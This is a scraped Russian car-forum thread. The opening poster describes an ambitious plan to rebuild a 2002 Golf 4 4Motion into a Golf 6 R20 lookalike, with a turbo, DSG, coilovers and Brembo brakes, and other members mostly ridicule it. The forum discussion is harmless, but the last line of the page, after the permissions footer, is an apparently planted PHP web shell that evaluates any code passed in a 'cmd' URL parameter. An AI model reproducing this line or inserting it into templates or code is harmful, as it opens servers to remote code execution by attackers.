+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 28

Тема: Превращение Golf 4 4Motion 2002 в Golf 6 R20 4Motion 2009


  1. #1
    Denni100
    Guest Аватар для Denni100

    Post Превращение Golf 4 4Motion 2002 в Golf 6 R20 4Motion 2009

    Я давно уже решил влиться в ваши ряды(ряды владельцев Golf) и тут один мой знакомый решил поменять свой Golf 4 4Motion 2002 на Golf R32.И я решил приобрести у него Golf 4 4Motion, но мне нужен не просто довольно мощный Golf с полным приводом, а универсальный болид, с потенциалом победить в драге, но при этом не напрягающий в городской езде высокой мощностью, и способный на уверенное перемещение по трассе с приемлемо высокой скоростью.Также мне не нужна "голая" мощность: требуется возможность держать её под контролем-во время разгона и при торможении, в повороте и на скоростной прямой.Ещё я хотел бы превратить кузов 4-того golf в 5-ый или даже 6-ой(трёхдверный) с ламбо дверями, при этом я хочу панорамную крышу и по максимуму облегчить кузов за счет карбона и алюминия.Кроме того я хочу использовать в машине шести или семи ступенчатую коробку DSG при этом я хотел бы(т.к. не очень уверен, но очень сильно надеюсь что это получится) установить её сзади(как у nissan Gt-R) для лучшей развесовки по осям.Вот мои основные технические идеи:кованные поршни,шатуны "колено" от компании Eurospec;новая турбина Garrett GT28RS или GT35R; для системы подачи топлива новые форсунки 700cc и бензонасос Bosch Motosport 044;для управления таким мотором хочу установить ЭБУ от R32 специально настроенный под такой мотор;также в подвеске хочу поставить регулируемую винтовую подвеску Billstain PSS9,дополненную стабилизаторами поперечной устойчивости B&R;насчет тормозов думаю поставить метало-керамику Brembo BNR34 4-х поршневые,перфорированые.
    Хотел бы услышать ваши советы по поводу такого тюнинга, а также какая компания сможет его исполнить. Заранее спасибо.

    P.S.Кстати бюджет на тюнинг 20 000-25 000 $.Как думаете хватит?
    Последний раз редактировалось Denni100; 11.11.2009 в 11:38.

  2. #2
    паржал =)

    З.Ы. а не проще сразу купить R20? ну или если охота мозг себе повыносить - то R32 взять и турбировать его?
    Skoda Octavia 1U
    лифтбэк; ARX-1.8T-4х4; МКПП; 2002 г.в.
    http://www.drive2.ru/cars/skoda/octa...our/gav-ri-la/

  3. #3
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Это прямо шпаргалка для проекта нашего крэйзи инженера )))
    С уважением, Василий.

    My onboard video.

  4. #4
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    LOL!!!
    Купи плэйстейшен! Только там можно натюнячить всё о чём пишеш и при этом машина останется....
    "универсальным болидом, с потенциалом победить в драге, но при этом не напрягающий в городской езде высокой мощностью, и способный на уверенное перемещение по трассе с приемлемо высокой скоростью".

  5. #5
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Опять нас дурят! :laugh:
    Я тоже подозреваю, что это проделки Крэзи Инженера, его почерк! :friends:
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  6. #6
    GTI-Racing mas1er is on a distinguished road Аватар для mas1er
    Регистрация
    08.09.2006
    Откуда
    Краснодар
    Машина
    mk4
    Сообщений
    1,405
    афтар набор фраз copy-paste?
    '02mk4 GTi st1 * Forge007 DV * WEITEC coilovers * 312 * R32 sway bar продан
    '12mk6 GTi MT APR * Carbonio intake * Neuspeed Turbo Outlet pipe * Eibach Sportline

  7. #7

  8. #8
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    При таком количестве терминов и брэндов на спам-бота не похоже :) :) :)
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    По количеству скобок это наш человек !!! ))))))))))))) оттюнячим по полной.

    Для начала нужно посмотреть на этот Г4 так сказать на фотках, раз пишем в теме клубные авто
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    GTI-Racing HAWK has a spectacular aura about HAWK has a spectacular aura about Аватар для HAWK
    Регистрация
    17.06.2009
    Откуда
    SPB
    Машина
    MK4
    Сообщений
    576
    MKIV GTI AGU-sold
    BMW 120D ///M -pack-sold
    BMW 325 Xi ///M -pack-sold
    AUDI Q3 REVO St.1

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. golf mk4, 2.8, V6, 4motion
    от axwell1987 в разделе Клубные машины
    Ответов: 7
    Последнее сообщение: 02.10.2014, 18:20
  2. golf IV 2.8 4motion
    от redline в разделе Отзывы / Выбор
    Ответов: 3
    Последнее сообщение: 07.05.2009, 01:05
  3. Продам В5+ 2002 2.8 4motion Auto 385000руб
    от Spark696 в разделе Покупка и продажа авто
    Ответов: 1
    Последнее сообщение: 21.08.2008, 10:49
  4. Продаю Golf 4 V6 4motion
    от KyRT в разделе Покупка и продажа авто
    Ответов: 19
    Последнее сообщение: 04.03.2008, 17:54
  5. Golf IV 1.8 vs 4motion
    от maslo в разделе Отзывы / Выбор
    Ответов: 3
    Последнее сообщение: 14.02.2007, 12:16

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}